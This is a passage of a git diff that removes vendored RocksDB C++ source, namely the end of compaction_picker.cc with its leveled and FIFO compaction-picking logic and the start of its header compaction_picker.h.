-  // For each level, it does the following things:
-  // 1. Find the first and the last compaction input files
-  //    in the current level.
-  // 2. Include all files between the first and the last
-  //    compaction input files.
-  // 3. Update the compaction key-range.
-  // 4. For all remaining levels, include files that have
-  //    overlapping key-range with the compaction key-range.
-  for (int l = 0; l <= output_level; ++l) {
-    auto& current_files = levels[l].files;
-    int first_included = static_cast<int>(current_files.size());
-    int last_included = kNotFound;
-
-    // identify the first and the last compaction input files
-    // in the current level.
-    for (size_t f = 0; f < current_files.size(); ++f) {
-      if (input_files->find(TableFileNameToNumber(current_files[f].name)) !=
-          input_files->end()) {
-        first_included = std::min(first_included, static_cast<int>(f));
-        last_included = std::max(last_included, static_cast<int>(f));
-        if (is_first == false) {
-          smallestkey = current_files[f].smallestkey;
-          largestkey = current_files[f].largestkey;
-          is_first = true;
-        }
-      }
-    }
-    if (last_included == kNotFound) {
-      continue;
-    }
-
-    if (l != 0) {
-      // expend the compaction input of the current level if it
-      // has overlapping key-range with other non-compaction input
-      // files in the same level.
-      while (first_included > 0) {
-        if (comparator->Compare(current_files[first_included - 1].largestkey,
-                                current_files[first_included].smallestkey) <
-            0) {
-          break;
-        }
-        first_included--;
-      }
-
-      while (last_included < static_cast<int>(current_files.size()) - 1) {
-        if (comparator->Compare(current_files[last_included + 1].smallestkey,
-                                current_files[last_included].largestkey) > 0) {
-          break;
-        }
-        last_included++;
-      }
-    }
-
-    // include all files between the first and the last compaction input files.
-    for (int f = first_included; f <= last_included; ++f) {
-      if (current_files[f].being_compacted) {
-        return Status::Aborted("Necessary compaction input file " +
-                               current_files[f].name +
-                               " is currently being compacted.");
-      }
-      input_files->insert(TableFileNameToNumber(current_files[f].name));
-    }
-
-    // update smallest and largest key
-    if (l == 0) {
-      for (int f = first_included; f <= last_included; ++f) {
-        if (comparator->Compare(smallestkey, current_files[f].smallestkey) >
-            0) {
-          smallestkey = current_files[f].smallestkey;
-        }
-        if (comparator->Compare(largestkey, current_files[f].largestkey) < 0) {
-          largestkey = current_files[f].largestkey;
-        }
-      }
-    } else {
-      if (comparator->Compare(smallestkey,
-                              current_files[first_included].smallestkey) > 0) {
-        smallestkey = current_files[first_included].smallestkey;
-      }
-      if (comparator->Compare(largestkey,
-                              current_files[last_included].largestkey) < 0) {
-        largestkey = current_files[last_included].largestkey;
-      }
-    }
-
-    SstFileMetaData aggregated_file_meta;
-    aggregated_file_meta.smallestkey = smallestkey;
-    aggregated_file_meta.largestkey = largestkey;
-
-    // For all lower levels, include all overlapping files.
-    // We need to add overlapping files from the current level too because even
-    // if there no input_files in level l, we would still need to add files
-    // which overlap with the range containing the input_files in levels 0 to l
-    // Level 0 doesn't need to be handled this way because files are sorted by
-    // time and not by key
-    for (int m = std::max(l, 1); m <= output_level; ++m) {
-      for (auto& next_lv_file : levels[m].files) {
-        if (HaveOverlappingKeyRanges(comparator, aggregated_file_meta,
-                                     next_lv_file)) {
-          if (next_lv_file.being_compacted) {
-            return Status::Aborted(
-                "File " + next_lv_file.name +
-                " that has overlapping key range with one of the compaction "
-                " input file is currently being compacted.");
-          }
-          input_files->insert(TableFileNameToNumber(next_lv_file.name));
-        }
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status CompactionPicker::SanitizeCompactionInputFiles(
-    std::unordered_set<uint64_t>* input_files,
-    const ColumnFamilyMetaData& cf_meta, const int output_level) const {
-  assert(static_cast<int>(cf_meta.levels.size()) - 1 ==
-         cf_meta.levels[cf_meta.levels.size() - 1].level);
-  if (output_level >= static_cast<int>(cf_meta.levels.size())) {
-    return Status::InvalidArgument(
-        "Output level for column family " + cf_meta.name +
-        " must between [0, " +
-        ToString(cf_meta.levels[cf_meta.levels.size() - 1].level) + "].");
-  }
-
-  if (output_level > MaxOutputLevel()) {
-    return Status::InvalidArgument(
-        "Exceed the maximum output level defined by "
-        "the current compaction algorithm --- " +
-        ToString(MaxOutputLevel()));
-  }
-
-  if (output_level < 0) {
-    return Status::InvalidArgument("Output level cannot be negative.");
-  }
-
-  if (input_files->size() == 0) {
-    return Status::InvalidArgument(
-        "A compaction must contain at least one file.");
-  }
-
-  Status s = SanitizeCompactionInputFilesForAllLevels(input_files, cf_meta,
-                                                      output_level);
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  // for all input files, check whether the file number matches
-  // any currently-existing files.
-  for (auto file_num : *input_files) {
-    bool found = false;
-    for (auto level_meta : cf_meta.levels) {
-      for (auto file_meta : level_meta.files) {
-        if (file_num == TableFileNameToNumber(file_meta.name)) {
-          if (file_meta.being_compacted) {
-            return Status::Aborted("Specified compaction input file " +
-                                   MakeTableFileName("", file_num) +
-                                   " is already being compacted.");
-          }
-          found = true;
-          break;
-        }
-      }
-      if (found) {
-        break;
-      }
-    }
-    if (!found) {
-      return Status::InvalidArgument(
-          "Specified compaction input file " + MakeTableFileName("", file_num) +
-          " does not exist in column family " + cf_meta.name + ".");
-    }
-  }
-
-  return Status::OK();
-}
-#endif  // !ROCKSDB_LITE
-
-void CompactionPicker::RegisterCompaction(Compaction* c) {
-  if (c == nullptr) {
-    return;
-  }
-  assert(ioptions_.compaction_style != kCompactionStyleLevel ||
-         c->output_level() == 0 ||
-         !FilesRangeOverlapWithCompaction(*c->inputs(), c->output_level()));
-  if (c->start_level() == 0 ||
-      ioptions_.compaction_style == kCompactionStyleUniversal) {
-    level0_compactions_in_progress_.insert(c);
-  }
-  compactions_in_progress_.insert(c);
-}
-
-void CompactionPicker::UnregisterCompaction(Compaction* c) {
-  if (c == nullptr) {
-    return;
-  }
-  if (c->start_level() == 0 ||
-      ioptions_.compaction_style == kCompactionStyleUniversal) {
-    level0_compactions_in_progress_.erase(c);
-  }
-  compactions_in_progress_.erase(c);
-}
-
-bool LevelCompactionPicker::NeedsCompaction(
-    const VersionStorageInfo* vstorage) const {
-  if (!vstorage->FilesMarkedForCompaction().empty()) {
-    return true;
-  }
-  for (int i = 0; i <= vstorage->MaxInputLevel(); i++) {
-    if (vstorage->CompactionScore(i) >= 1) {
-      return true;
-    }
-  }
-  return false;
-}
-
-namespace {
-// A class to build a leveled compaction step-by-step.
-class LevelCompactionBuilder {
- public:
-  LevelCompactionBuilder(const std::string& cf_name,
-                         VersionStorageInfo* vstorage,
-                         CompactionPicker* compaction_picker,
-                         LogBuffer* log_buffer,
-                         const MutableCFOptions& mutable_cf_options,
-                         const ImmutableCFOptions& ioptions)
-      : cf_name_(cf_name),
-        vstorage_(vstorage),
-        compaction_picker_(compaction_picker),
-        log_buffer_(log_buffer),
-        mutable_cf_options_(mutable_cf_options),
-        ioptions_(ioptions) {}
-
-  // Pick and return a compaction.
-  Compaction* PickCompaction();
-
-  // Pick the initial files to compact to the next level. (or together
-  // in Intra-L0 compactions)
-  void SetupInitialFiles();
-
-  // If the initial files are from L0 level, pick other L0
-  // files if needed.
-  bool SetupOtherL0FilesIfNeeded();
-
-  // Based on initial files, setup other files need to be compacted
-  // in this compaction, accordingly.
-  bool SetupOtherInputsIfNeeded();
-
-  Compaction* GetCompaction();
-
-  // For the specfied level, pick a file that we want to compact.
-  // Returns false if there is no file to compact.
-  // If it returns true, inputs->files.size() will be exactly one.
-  // If level is 0 and there is already a compaction on that level, this
-  // function will return false.
-  bool PickFileToCompact();
-
-  // For L0->L0, picks the longest span of files that aren't currently
-  // undergoing compaction for which work-per-deleted-file decreases. The span
-  // always starts from the newest L0 file.
-  //
-  // Intra-L0 compaction is independent of all other files, so it can be
-  // performed even when L0->base_level compactions are blocked.
-  //
-  // Returns true if `inputs` is populated with a span of files to be compacted;
-  // otherwise, returns false.
-  bool PickIntraL0Compaction();
-
-  // If there is any file marked for compaction, put put it into inputs.
-  void PickFilesMarkedForCompaction();
-
-  const std::string& cf_name_;
-  VersionStorageInfo* vstorage_;
-  CompactionPicker* compaction_picker_;
-  LogBuffer* log_buffer_;
-  int start_level_ = -1;
-  int output_level_ = -1;
-  int parent_index_ = -1;
-  int base_index_ = -1;
-  double start_level_score_ = 0;
-  bool is_manual_ = false;
-  CompactionInputFiles start_level_inputs_;
-  std::vector<CompactionInputFiles> compaction_inputs_;
-  CompactionInputFiles output_level_inputs_;
-  std::vector<FileMetaData*> grandparents_;
-  CompactionReason compaction_reason_ = CompactionReason::kUnknown;
-
-  const MutableCFOptions& mutable_cf_options_;
-  const ImmutableCFOptions& ioptions_;
-  // Pick a path ID to place a newly generated file, with its level
-  static uint32_t GetPathId(const ImmutableCFOptions& ioptions,
-                            const MutableCFOptions& mutable_cf_options,
-                            int level);
-
-  static const int kMinFilesForIntraL0Compaction = 4;
-};
-
-void LevelCompactionBuilder::PickFilesMarkedForCompaction() {
-  if (vstorage_->FilesMarkedForCompaction().empty()) {
-    return;
-  }
-
-  auto continuation = [&](std::pair<int, FileMetaData*> level_file) {
-    // If it's being compacted it has nothing to do here.
-    // If this assert() fails that means that some function marked some
-    // files as being_compacted, but didn't call ComputeCompactionScore()
-    assert(!level_file.second->being_compacted);
-    start_level_ = level_file.first;
-    output_level_ =
-        (start_level_ == 0) ? vstorage_->base_level() : start_level_ + 1;
-
-    if (start_level_ == 0 &&
-        !compaction_picker_->level0_compactions_in_progress()->empty()) {
-      return false;
-    }
-
-    start_level_inputs_.files = {level_file.second};
-    start_level_inputs_.level = start_level_;
-    return compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_,
-                                                      &start_level_inputs_);
-  };
-
-  // take a chance on a random file first
-  Random64 rnd(/* seed */ reinterpret_cast<uint64_t>(vstorage_));
-  size_t random_file_index = static_cast<size_t>(rnd.Uniform(
-      static_cast<uint64_t>(vstorage_->FilesMarkedForCompaction().size())));
-
-  if (continuation(vstorage_->FilesMarkedForCompaction()[random_file_index])) {
-    // found the compaction!
-    return;
-  }
-
-  for (auto& level_file : vstorage_->FilesMarkedForCompaction()) {
-    if (continuation(level_file)) {
-      // found the compaction!
-      return;
-    }
-  }
-  start_level_inputs_.files.clear();
-}
-
-void LevelCompactionBuilder::SetupInitialFiles() {
-  // Find the compactions by size on all levels.
-  bool skipped_l0_to_base = false;
-  for (int i = 0; i < compaction_picker_->NumberLevels() - 1; i++) {
-    start_level_score_ = vstorage_->CompactionScore(i);
-    start_level_ = vstorage_->CompactionScoreLevel(i);
-    assert(i == 0 || start_level_score_ <= vstorage_->CompactionScore(i - 1));
-    if (start_level_score_ >= 1) {
-      if (skipped_l0_to_base && start_level_ == vstorage_->base_level()) {
-        // If L0->base_level compaction is pending, don't schedule further
-        // compaction from base level. Otherwise L0->base_level compaction
-        // may starve.
-        continue;
-      }
-      output_level_ =
-          (start_level_ == 0) ? vstorage_->base_level() : start_level_ + 1;
-      if (PickFileToCompact()) {
-        // found the compaction!
-        if (start_level_ == 0) {
-          // L0 score = `num L0 files` / `level0_file_num_compaction_trigger`
-          compaction_reason_ = CompactionReason::kLevelL0FilesNum;
-        } else {
-          // L1+ score = `Level files size` / `MaxBytesForLevel`
-          compaction_reason_ = CompactionReason::kLevelMaxLevelSize;
-        }
-        break;
-      } else {
-        // didn't find the compaction, clear the inputs
-        start_level_inputs_.clear();
-        if (start_level_ == 0) {
-          skipped_l0_to_base = true;
-          // L0->base_level may be blocked due to ongoing L0->base_level
-          // compactions. It may also be blocked by an ongoing compaction from
-          // base_level downwards.
-          //
-          // In these cases, to reduce L0 file count and thus reduce likelihood
-          // of write stalls, we can attempt compacting a span of files within
-          // L0.
-          if (PickIntraL0Compaction()) {
-            output_level_ = 0;
-            compaction_reason_ = CompactionReason::kLevelL0FilesNum;
-            break;
-          }
-        }
-      }
-    }
-  }
-
-  // if we didn't find a compaction, check if there are any files marked for
-  // compaction
-  if (start_level_inputs_.empty()) {
-    is_manual_ = true;
-    parent_index_ = base_index_ = -1;
-    PickFilesMarkedForCompaction();
-    if (!start_level_inputs_.empty()) {
-      compaction_reason_ = CompactionReason::kFilesMarkedForCompaction;
-    }
-  }
-}
-
-bool LevelCompactionBuilder::SetupOtherL0FilesIfNeeded() {
-  if (start_level_ == 0 && output_level_ != 0) {
-    // Two level 0 compaction won't run at the same time, so don't need to worry
-    // about files on level 0 being compacted.
-    assert(compaction_picker_->level0_compactions_in_progress()->empty());
-    InternalKey smallest, largest;
-    compaction_picker_->GetRange(start_level_inputs_, &smallest, &largest);
-    // Note that the next call will discard the file we placed in
-    // c->inputs_[0] earlier and replace it with an overlapping set
-    // which will include the picked file.
-    start_level_inputs_.files.clear();
-    vstorage_->GetOverlappingInputs(0, &smallest, &largest,
-                                    &start_level_inputs_.files);
-
-    // If we include more L0 files in the same compaction run it can
-    // cause the 'smallest' and 'largest' key to get extended to a
-    // larger range. So, re-invoke GetRange to get the new key range
-    compaction_picker_->GetRange(start_level_inputs_, &smallest, &largest);
-    if (compaction_picker_->IsRangeInCompaction(
-            vstorage_, &smallest, &largest, output_level_, &parent_index_)) {
-      return false;
-    }
-  }
-  assert(!start_level_inputs_.files.empty());
-
-  return true;
-}
-
-bool LevelCompactionBuilder::SetupOtherInputsIfNeeded() {
-  // Setup input files from output level. For output to L0, we only compact
-  // spans of files that do not interact with any pending compactions, so don't
-  // need to consider other levels.
-  if (output_level_ != 0) {
-    output_level_inputs_.level = output_level_;
-    if (!compaction_picker_->SetupOtherInputs(
-            cf_name_, mutable_cf_options_, vstorage_, &start_level_inputs_,
-            &output_level_inputs_, &parent_index_, base_index_)) {
-      return false;
-    }
-
-    compaction_inputs_.push_back(start_level_inputs_);
-    if (!output_level_inputs_.empty()) {
-      compaction_inputs_.push_back(output_level_inputs_);
-    }
-
-    // In some edge cases we could pick a compaction that will be compacting
-    // a key range that overlap with another running compaction, and both
-    // of them have the same output level. This could happen if
-    // (1) we are running a non-exclusive manual compaction
-    // (2) AddFile ingest a new file into the LSM tree
-    // We need to disallow this from happening.
-    if (compaction_picker_->FilesRangeOverlapWithCompaction(compaction_inputs_,
-                                                            output_level_)) {
-      // This compaction output could potentially conflict with the output
-      // of a currently running compaction, we cannot run it.
-      return false;
-    }
-    compaction_picker_->GetGrandparents(vstorage_, start_level_inputs_,
-                                        output_level_inputs_, &grandparents_);
-  } else {
-    compaction_inputs_.push_back(start_level_inputs_);
-  }
-  return true;
-}
-
-Compaction* LevelCompactionBuilder::PickCompaction() {
-  // Pick up the first file to start compaction. It may have been extended
-  // to a clean cut.
-  SetupInitialFiles();
-  if (start_level_inputs_.empty()) {
-    return nullptr;
-  }
-  assert(start_level_ >= 0 && output_level_ >= 0);
-
-  // If it is a L0 -> base level compaction, we need to set up other L0
-  // files if needed.
-  if (!SetupOtherL0FilesIfNeeded()) {
-    return nullptr;
-  }
-
-  // Pick files in the output level and expand more files in the start level
-  // if needed.
-  if (!SetupOtherInputsIfNeeded()) {
-    return nullptr;
-  }
-
-  // Form a compaction object containing the files we picked.
-  Compaction* c = GetCompaction();
-
-  TEST_SYNC_POINT_CALLBACK("LevelCompactionPicker::PickCompaction:Return", c);
-
-  return c;
-}
-
-Compaction* LevelCompactionBuilder::GetCompaction() {
-  auto c = new Compaction(
-      vstorage_, ioptions_, mutable_cf_options_, std::move(compaction_inputs_),
-      output_level_, mutable_cf_options_.MaxFileSizeForLevel(output_level_),
-      mutable_cf_options_.max_compaction_bytes,
-      GetPathId(ioptions_, mutable_cf_options_, output_level_),
-      GetCompressionType(ioptions_, vstorage_, mutable_cf_options_,
-                         output_level_, vstorage_->base_level()),
-      std::move(grandparents_), is_manual_, start_level_score_,
-      false /* deletion_compaction */, compaction_reason_);
-
-  // If it's level 0 compaction, make sure we don't execute any other level 0
-  // compactions in parallel
-  compaction_picker_->RegisterCompaction(c);
-
-  // Creating a compaction influences the compaction score because the score
-  // takes running compactions into account (by skipping files that are already
-  // being compacted). Since we just changed compaction score, we recalculate it
-  // here
-  vstorage_->ComputeCompactionScore(ioptions_, mutable_cf_options_);
-  return c;
-}
-
-/*
- * Find the optimal path to place a file
- * Given a level, finds the path where levels up to it will fit in levels
- * up to and including this path
- */
-uint32_t LevelCompactionBuilder::GetPathId(
-    const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options, int level) {
-  uint32_t p = 0;
-  assert(!ioptions.db_paths.empty());
-
-  // size remaining in the most recent path
-  uint64_t current_path_size = ioptions.db_paths[0].target_size;
-
-  uint64_t level_size;
-  int cur_level = 0;
-
-  level_size = mutable_cf_options.max_bytes_for_level_base;
-
-  // Last path is the fallback
-  while (p < ioptions.db_paths.size() - 1) {
-    if (level_size <= current_path_size) {
-      if (cur_level == level) {
-        // Does desired level fit in this path?
-        return p;
-      } else {
-        current_path_size -= level_size;
-        level_size = static_cast<uint64_t>(
-            level_size * mutable_cf_options.max_bytes_for_level_multiplier);
-        cur_level++;
-        continue;
-      }
-    }
-    p++;
-    current_path_size = ioptions.db_paths[p].target_size;
-  }
-  return p;
-}
-
-bool LevelCompactionBuilder::PickFileToCompact() {
-  // level 0 files are overlapping. So we cannot pick more
-  // than one concurrent compactions at this level. This
-  // could be made better by looking at key-ranges that are
-  // being compacted at level 0.
-  if (start_level_ == 0 &&
-      !compaction_picker_->level0_compactions_in_progress()->empty()) {
-    TEST_SYNC_POINT("LevelCompactionPicker::PickCompactionBySize:0");
-    return false;
-  }
-
-  start_level_inputs_.clear();
-
-  assert(start_level_ >= 0);
-
-  // Pick the largest file in this level that is not already
-  // being compacted
-  const std::vector<int>& file_size =
-      vstorage_->FilesByCompactionPri(start_level_);
-  const std::vector<FileMetaData*>& level_files =
-      vstorage_->LevelFiles(start_level_);
-
-  unsigned int cmp_idx;
-  for (cmp_idx = vstorage_->NextCompactionIndex(start_level_);
-       cmp_idx < file_size.size(); cmp_idx++) {
-    int index = file_size[cmp_idx];
-    auto* f = level_files[index];
-
-    // do not pick a file to compact if it is being compacted
-    // from n-1 level.
-    if (f->being_compacted) {
-      continue;
-    }
-
-    start_level_inputs_.files.push_back(f);
-    start_level_inputs_.level = start_level_;
-    if (!compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_,
-                                                    &start_level_inputs_) ||
-        compaction_picker_->FilesRangeOverlapWithCompaction(
-            {start_level_inputs_}, output_level_)) {
-      // A locked (pending compaction) input-level file was pulled in due to
-      // user-key overlap.
-      start_level_inputs_.clear();
-      continue;
-    }
-
-    // Now that input level is fully expanded, we check whether any output files
-    // are locked due to pending compaction.
-    //
-    // Note we rely on ExpandInputsToCleanCut() to tell us whether any output-
-    // level files are locked, not just the extra ones pulled in for user-key
-    // overlap.
-    InternalKey smallest, largest;
-    compaction_picker_->GetRange(start_level_inputs_, &smallest, &largest);
-    CompactionInputFiles output_level_inputs;
-    output_level_inputs.level = output_level_;
-    vstorage_->GetOverlappingInputs(output_level_, &smallest, &largest,
-                                    &output_level_inputs.files);
-    if (!output_level_inputs.empty() &&
-        !compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_,
-                                                    &output_level_inputs)) {
-      start_level_inputs_.clear();
-      continue;
-    }
-    base_index_ = index;
-    break;
-  }
-
-  // store where to start the iteration in the next call to PickCompaction
-  vstorage_->SetNextCompactionIndex(start_level_, cmp_idx);
-
-  return start_level_inputs_.size() > 0;
-}
-
-bool LevelCompactionBuilder::PickIntraL0Compaction() {
-  start_level_inputs_.clear();
-  const std::vector<FileMetaData*>& level_files =
-      vstorage_->LevelFiles(0 /* level */);
-  if (level_files.size() <
-          static_cast<size_t>(
-              mutable_cf_options_.level0_file_num_compaction_trigger + 2) ||
-      level_files[0]->being_compacted) {
-    // If L0 isn't accumulating much files beyond the regular trigger, don't
-    // resort to L0->L0 compaction yet.
-    return false;
-  }
-  return FindIntraL0Compaction(level_files, kMinFilesForIntraL0Compaction,
-                               port::kMaxUint64, &start_level_inputs_);
-}
-}  // namespace
-
-Compaction* LevelCompactionPicker::PickCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  LevelCompactionBuilder builder(cf_name, vstorage, this, log_buffer,
-                                 mutable_cf_options, ioptions_);
-  return builder.PickCompaction();
-}
-
-#ifndef ROCKSDB_LITE
-bool FIFOCompactionPicker::NeedsCompaction(
-    const VersionStorageInfo* vstorage) const {
-  const int kLevel0 = 0;
-  return vstorage->CompactionScore(kLevel0) >= 1;
-}
-
-namespace {
-uint64_t GetTotalFilesSize(
-    const std::vector<FileMetaData*>& files) {
-  uint64_t total_size = 0;
-  for (const auto& f : files) {
-    total_size += f->fd.file_size;
-  }
-  return total_size;
-}
-}  // anonymous namespace
-
-Compaction* FIFOCompactionPicker::PickTTLCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  assert(ioptions_.compaction_options_fifo.ttl > 0);
-
-  const int kLevel0 = 0;
-  const std::vector<FileMetaData*>& level_files = vstorage->LevelFiles(kLevel0);
-  uint64_t total_size = GetTotalFilesSize(level_files);
-
-  int64_t _current_time;
-  auto status = ioptions_.env->GetCurrentTime(&_current_time);
-  if (!status.ok()) {
-    ROCKS_LOG_BUFFER(log_buffer,
-                     "[%s] FIFO compaction: Couldn't get current time: %s. "
-                     "Not doing compactions based on TTL. ",
-                     cf_name.c_str(), status.ToString().c_str());
-    return nullptr;
-  }
-  const uint64_t current_time = static_cast<uint64_t>(_current_time);
-
-  std::vector<CompactionInputFiles> inputs;
-  inputs.emplace_back();
-  inputs[0].level = 0;
-
-  // avoid underflow
-  if (current_time > ioptions_.compaction_options_fifo.ttl) {
-    for (auto ritr = level_files.rbegin(); ritr != level_files.rend(); ++ritr) {
-      auto f = *ritr;
-      if (f->fd.table_reader != nullptr &&
-          f->fd.table_reader->GetTableProperties() != nullptr) {
-        auto creation_time =
-            f->fd.table_reader->GetTableProperties()->creation_time;
-        if (creation_time == 0 ||
-            creation_time >=
-                (current_time - ioptions_.compaction_options_fifo.ttl)) {
-          break;
-        }
-        total_size -= f->compensated_file_size;
-        inputs[0].files.push_back(f);
-      }
-    }
-  }
-
-  // Return a nullptr and proceed to size-based FIFO compaction if:
-  // 1. there are no files older than ttl OR
-  // 2. there are a few files older than ttl, but deleting them will not bring
-  //    the total size to be less than max_table_files_size threshold.
-  if (inputs[0].files.empty() ||
-      total_size > ioptions_.compaction_options_fifo.max_table_files_size) {
-    return nullptr;
-  }
-
-  for (const auto& f : inputs[0].files) {
-    ROCKS_LOG_BUFFER(log_buffer,
-                     "[%s] FIFO compaction: picking file %" PRIu64
-                     " with creation time %" PRIu64 " for deletion",
-                     cf_name.c_str(), f->fd.GetNumber(),
-                     f->fd.table_reader->GetTableProperties()->creation_time);
-  }
-
-  Compaction* c = new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(inputs), 0, 0, 0, 0,
-      kNoCompression, {}, /* is manual */ false, vstorage->CompactionScore(0),
-      /* is deletion compaction */ true, CompactionReason::kFIFOTtl);
-  return c;
-}
-
-Compaction* FIFOCompactionPicker::PickSizeCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  const int kLevel0 = 0;
-  const std::vector<FileMetaData*>& level_files = vstorage->LevelFiles(kLevel0);
-  uint64_t total_size = GetTotalFilesSize(level_files);
-
-  if (total_size <= ioptions_.compaction_options_fifo.max_table_files_size ||
-      level_files.size() == 0) {
-    // total size not exceeded
-    if (ioptions_.compaction_options_fifo.allow_compaction &&
-        level_files.size() > 0) {
-      CompactionInputFiles comp_inputs;
-      if (FindIntraL0Compaction(
-              level_files,
-              mutable_cf_options
-                  .level0_file_num_compaction_trigger /* min_files_to_compact */,
-              mutable_cf_options.write_buffer_size, &comp_inputs)) {
-        Compaction* c = new Compaction(
-            vstorage, ioptions_, mutable_cf_options, {comp_inputs}, 0,
-            16 * 1024 * 1024 /* output file size limit */,
-            0 /* max compaction bytes, not applicable */,
-            0 /* output path ID */, mutable_cf_options.compression, {},
-            /* is manual */ false, vstorage->CompactionScore(0),
-            /* is deletion compaction */ false,
-            CompactionReason::kFIFOReduceNumFiles);
-        return c;
-      }
-    }
-
-    ROCKS_LOG_BUFFER(log_buffer,
-                     "[%s] FIFO compaction: nothing to do. Total size %" PRIu64
-                     ", max size %" PRIu64 "\n",
-                     cf_name.c_str(), total_size,
-                     ioptions_.compaction_options_fifo.max_table_files_size);
-    return nullptr;
-  }
-
-  if (!level0_compactions_in_progress_.empty()) {
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] FIFO compaction: Already executing compaction. No need "
-        "to run parallel compactions since compactions are very fast",
-        cf_name.c_str());
-    return nullptr;
-  }
-
-  std::vector<CompactionInputFiles> inputs;
-  inputs.emplace_back();
-  inputs[0].level = 0;
-
-  for (auto ritr = level_files.rbegin(); ritr != level_files.rend(); ++ritr) {
-    auto f = *ritr;
-    total_size -= f->compensated_file_size;
-    inputs[0].files.push_back(f);
-    char tmp_fsize[16];
-    AppendHumanBytes(f->fd.GetFileSize(), tmp_fsize, sizeof(tmp_fsize));
-    ROCKS_LOG_BUFFER(log_buffer,
-                     "[%s] FIFO compaction: picking file %" PRIu64
-                     " with size %s for deletion",
-                     cf_name.c_str(), f->fd.GetNumber(), tmp_fsize);
-    if (total_size <= ioptions_.compaction_options_fifo.max_table_files_size) {
-      break;
-    }
-  }
-
-  Compaction* c = new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(inputs), 0, 0, 0, 0,
-      kNoCompression, {}, /* is manual */ false, vstorage->CompactionScore(0),
-      /* is deletion compaction */ true, CompactionReason::kFIFOMaxSize);
-  return c;
-}
-
-Compaction* FIFOCompactionPicker::PickCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  assert(vstorage->num_levels() == 1);
-
-  Compaction* c = nullptr;
-  if (ioptions_.compaction_options_fifo.ttl > 0) {
-    c = PickTTLCompaction(cf_name, mutable_cf_options, vstorage, log_buffer);
-  }
-  if (c == nullptr) {
-    c = PickSizeCompaction(cf_name, mutable_cf_options, vstorage, log_buffer);
-  }
-  RegisterCompaction(c);
-  return c;
-}
-
-Compaction* FIFOCompactionPicker::CompactRange(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, int input_level, int output_level,
-    uint32_t output_path_id, const InternalKey* begin, const InternalKey* end,
-    InternalKey** compaction_end, bool* manual_conflict) {
-  assert(input_level == 0);
-  assert(output_level == 0);
-  *compaction_end = nullptr;
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL, ioptions_.info_log);
-  Compaction* c =
-      PickCompaction(cf_name, mutable_cf_options, vstorage, &log_buffer);
-  log_buffer.FlushBufferToLog();
-  return c;
-}
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_picker.h b/thirdparty/rocksdb/db/compaction_picker.h
deleted file mode 100644
index f44139c..0000000
--- a/thirdparty/rocksdb/db/compaction_picker.h
+++ /dev/null
@@ -1,298 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-#include <set>
-#include <string>
-#include <unordered_set>
-#include <vector>
-
-#include "db/compaction.h"
-#include "db/version_set.h"
-#include "options/cf_options.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class LogBuffer;
-class Compaction;
-class VersionStorageInfo;
-struct CompactionInputFiles;
-
-class CompactionPicker {
- public:
-  CompactionPicker(const ImmutableCFOptions& ioptions,
-                   const InternalKeyComparator* icmp);
-  virtual ~CompactionPicker();
-
-  // Pick level and inputs for a new compaction.
-  // Returns nullptr if there is no compaction to be done.
-  // Otherwise returns a pointer to a heap-allocated object that
-  // describes the compaction.  Caller should delete the result.
-  virtual Compaction* PickCompaction(const std::string& cf_name,
-                                     const MutableCFOptions& mutable_cf_options,
-                                     VersionStorageInfo* vstorage,
-                                     LogBuffer* log_buffer) = 0;
-
-  // Return a compaction object for compacting the range [begin,end] in
-  // the specified level.  Returns nullptr if there is nothing in that
-  // level that overlaps the specified range.  Caller should delete
-  // the result.
-  //
-  // The returned Compaction might not include the whole requested range.
-  // In that case, compaction_end will be set to the next key that needs
-  // compacting. In case the compaction will compact the whole range,
-  // compaction_end will be set to nullptr.
-  // Client is responsible for compaction_end storage -- when called,
-  // *compaction_end should point to valid InternalKey!
-  virtual Compaction* CompactRange(
-      const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-      VersionStorageInfo* vstorage, int input_level, int output_level,
-      uint32_t output_path_id, const InternalKey* begin, const InternalKey* end,
-      InternalKey** compaction_end, bool* manual_conflict);
-
-  // The maximum allowed output level.  Default value is NumberLevels() - 1.
-  virtual int MaxOutputLevel() const { return NumberLevels() - 1; }
-
-  virtual bool NeedsCompaction(const VersionStorageInfo* vstorage) const = 0;
-
-// Sanitize the input set of compaction input files.
-// When the input parameters do not describe a valid compaction, the
-// function will try to fix the input_files by adding necessary
-// files.  If it's not possible to conver an invalid input_files
-// into a valid one by adding more files, the function will return a
-// non-ok status with specific reason.
-#ifndef ROCKSDB_LITE
-  Status SanitizeCompactionInputFiles(std::unordered_set<uint64_t>* input_files,
-                                      const ColumnFamilyMetaData& cf_meta,
-                                      const int output_level) const;
-#endif  // ROCKSDB_LITE
-
-  // Free up the files that participated in a compaction
-  //
-  // Requirement: DB mutex held
-  void ReleaseCompactionFiles(Compaction* c, Status status);
-
